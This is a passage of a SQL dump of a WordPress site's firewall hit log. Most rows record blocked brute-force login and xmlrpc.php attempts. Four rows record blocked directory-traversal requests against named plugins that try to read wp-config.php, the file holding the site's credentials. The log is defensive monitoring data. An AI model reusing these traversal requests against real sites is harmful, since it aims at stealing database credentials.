Network',NULL),(10492,0.000000,1630767642.500773,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10493,0.000000,1630767792.532868,'\0\0\0\0\0\0\0\0\0\0���n�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10494,0.000000,1630767876.327374,'\0\0\0\0\0\0\0\0\0\0��[�ɤ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10495,0.000000,1630768068.047018,'\0\0\0\0\0\0\0\0\0\0��D�\n9',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10496,0.000000,1630768286.651538,'\0\0\0\0\0\0\0\0\0\0��h�x',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10497,0.000000,1630768523.063912,'\0\0\0\0\0\0\0\0\0\0��E��|',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10498,0.000000,1630768568.415694,'\0\0\0\0\0\0\0\0\0\0���;v�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10499,0.000000,1630768742.582149,'\0\0\0\0\0\0\0\0\0\0���c]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10500,0.000000,1630768955.027303,'\0\0\0\0\0\0\0\0\0\0���B��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10501,0.000000,1630769183.710027,'\0\0\0\0\0\0\0\0\0\0����8$',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10502,0.000000,1630769229.811969,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10503,0.000000,1630769422.617061,'\0\0\0\0\0\0\0\0\0\0����X�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10504,0.000000,1630769657.376782,'\0\0\0\0\0\0\0\0\0\0���갞',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10505,0.000000,1630769858.390449,'\0\0\0\0\0\0\0\0\0\0���Ҝ4',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10506,0.000000,1630769907.818019,'\0\0\0\0\0\0\0\0\0\0��_��[',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10507,0.000000,1630770102.536992,'\0\0\0\0\0\0\0\0\0\0��#�1�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10508,0.000000,1630770334.125402,'\0\0\0\0\0\0\0\0\0\0��o]8�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10509,0.000000,1630770358.309585,'\0\0\0\0\0\0\0\0\0\0��Ú��',0,503,0,0,0,'https://www.dogstardesign.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10510,0.000000,1630770565.287739,'\0\0\0\0\0\0\0\0\0\0����I�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10511,0.000000,1630770677.153143,'\0\0\0\0\0\0\0\0\0\0����e�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10512,0.000000,1630770973.571661,'\0\0\0\0\0\0\0\0\0\0���7]',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10513,0.000000,1630771405.883165,'\0\0\0\0\0\0\0\0\0\0���Gڿ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10514,0.000000,1630771657.515189,'\0\0\0\0\0\0\0\0\0\0��#�^_',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10515,0.000000,1630771869.457973,'\0\0\0\0\0\0\0\0\0\0��PP��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10516,0.000000,1630772079.838791,'\0\0\0\0\0\0\0\0\0\0��gt�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10517,0.000000,1630772305.607220,'\0\0\0\0\0\0\0\0\0\0��e�+',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10518,0.000000,1630772531.091698,'\0\0\0\0\0\0\0\0\0\0��X�$�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10519,0.000000,1630772738.592919,'\0\0\0\0\0\0\0\0\0\0��3���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10520,0.000000,1630772947.524125,'\0\0\0\0\0\0\0\0\0\0���[a�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10521,0.000000,1630773138.653563,'\0\0\0\0\0\0\0\0\0\0���u,?',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10522,0.000000,1630773337.629621,'\0\0\0\0\0\0\0\0\0\0����s',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10523,0.000000,1630773538.522645,'\0\0\0\0\0\0\0\0\0\0����P�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10524,0.000000,1630773714.130827,'\0\0\0\0\0\0\0\0\0\0��B�h',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10525,0.000000,1630773733.225625,'\0\0\0\0\0\0\0\0\0\0��g|]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10526,0.000000,1630773950.487524,'\0\0\0\0\0\0\0\0\0\0��#�1�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10527,0.000000,1630774149.504370,'\0\0\0\0\0\0\0\0\0\0��g�t�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10528,0.000000,1630774319.740245,'\0\0\0\0\0\0\0\0\0\0��U���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10529,0.000000,1630774501.470180,'\0\0\0\0\0\0\0\0\0\0��t>f�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10530,0.000000,1630774674.901739,'\0\0\0\0\0\0\0\0\0\0���Gڿ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10531,0.000000,1630775053.568820,'\0\0\0\0\0\0\0\0\0\0���yQ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10532,0.000000,1630775230.178491,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10533,0.000000,1630775416.712013,'\0\0\0\0\0\0\0\0\0\0��[��R',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10534,0.000000,1630775589.247631,'\0\0\0\0\0\0\0\0\0\0��[�ɤ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10535,0.000000,1630775768.947944,'\0\0\0\0\0\0\0\0\0\0���Dm',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10536,0.000000,1630775950.251348,'\0\0\0\0\0\0\0\0\0\0����~�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10537,0.000000,1630776136.490654,'\0\0\0\0\0\0\0\0\0\0��R�5�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10538,0.000000,1630776300.118191,'\0\0\0\0\0\0\0\0\0\0��\"��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10539,0.000000,1630776488.579362,'\0\0\0\0\0\0\0\0\0\0���R-',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10540,0.000000,1630776656.689740,'\0\0\0\0\0\0\0\0\0\0����zX',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10541,0.000000,1630776837.937299,'\0\0\0\0\0\0\0\0\0\0��>��G',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10542,0.000000,1630777004.311080,'\0\0\0\0\0\0\0\0\0\0���5�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10543,0.000000,1630777180.785413,'\0\0\0\0\0\0\0\0\0\0��Ϛԛ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10544,0.000000,1630777375.539430,'\0\0\0\0\0\0\0\0\0\0��@Z(d',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10545,0.000000,1630777559.026354,'\0\0\0\0\0\0\0\0\0\0��B!�~',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10546,0.000000,1630777735.892859,'\0\0\0\0\0\0\0\0\0\0��H\n�k',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10547,0.000000,1630777907.333516,'\0\0\0\0\0\0\0\0\0\0���#��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10548,0.000000,1630778075.068600,'\0\0\0\0\0\0\0\0\0\0���C�h',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10549,0.000000,1630778252.228105,'\0\0\0\0\0\0\0\0\0\0��k��z',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10550,0.000000,1630778432.456819,'\0\0\0\0\0\0\0\0\0\0���w',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10551,0.000000,1630778608.929906,'\0\0\0\0\0\0\0\0\0\0��E��',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10552,0.000000,1630778781.967719,'\0\0\0\0\0\0\0\0\0\0��k�X)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10553,0.000000,1630778953.420283,'\0\0\0\0\0\0\0\0\0\0��H�)�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10554,0.000000,1630779126.712388,'\0\0\0\0\0\0\0\0\0\0��N�Q�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10555,0.000000,1630779313.584666,'\0\0\0\0\0\0\0\0\0\0��?�)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10556,0.000000,1630779487.639407,'\0\0\0\0\0\0\0\0\0\0���7]',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10557,0.000000,1630779658.536979,'\0\0\0\0\0\0\0\0\0\0���,�7',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10558,0.000000,1630779838.154927,'\0\0\0\0\0\0\0\0\0\0���c�9',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10559,0.000000,1630780017.470921,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10560,0.000000,1630780198.635087,'\0\0\0\0\0\0\0\0\0\0��6\'iX',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10561,0.000000,1630780366.462645,'\0\0\0\0\0\0\0\0\0\0���]��',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10562,0.000000,1630780521.808853,'\0\0\0\0\0\0\0\0\0\0��H8�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10563,0.000000,1630780723.246458,'\0\0\0\0\0\0\0\0\0\0��-MC�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10564,0.000000,1630780900.143382,'\0\0\0\0\0\0\0\0\0\0��#���',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10565,0.000000,1630782171.500818,'\0\0\0\0\0\0\0\0\0\0��#���',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10566,0.000000,1630783233.747772,'\0\0\0\0\0\0\0\0\0\0����~h',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10567,1630783453.091912,1630783453.005500,'\0\0\0\0\0\0\0\0\0\0��_��',0,403,0,0,0,'https://dogstardesign.co.uk/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxldXJsXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1taW5pYXVkaW9wbGF5ZXIvbWFwX2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(10568,1630783445.159736,1630783445.074700,'\0\0\0\0\0\0\0\0\0\0��_��',0,403,0,0,0,'https://dogstardesign.co.uk/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttbGFfZG93bmxvYWRfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZWRpYS1saWJyYXJ5LWFzc2lzdGFudC9pbmNsdWRlcy9tbGEtZmlsZS1kb3dubG9hZGVyLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(10569,1630783437.580159,1630783437.490300,'\0\0\0\0\0\0\0\0\0\0��_��',0,403,0,0,0,'https://dogstardesign.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(10570,1630783430.193997,1630783430.083400,'\0\0\0\0\0\0\0\0\0\0��_��',0,403,0,0,0,'https://dogstardesign.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(10571,0.000000,1630785628.207045,'\0\0\0\0\0\0\0\0\0\0��mW�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10572,0.000000,1630785724.568217,'\0\0\0\0\0\0\0\0\0\0���_�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10573,0.000000,1630786434.557083,'\0\0\0\0\0\0\0\0\0\0���Dd@',0,200,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10574,0.000000,1630787235.785865,'\0\0\0\0\0\0\0\0\0\0��]qo6',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10575,0.000000,1630788044.924734,'\0\0\0\0\0\0\0\0\0\0��\"���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10576,0.000000,1630788898.832876,'\0\0\0\0\0\0\0\0\0\0����s�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10577,0.000000,1630789749.321132,'\0\0\0\0\0\0\0\0\0\0���(%�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security 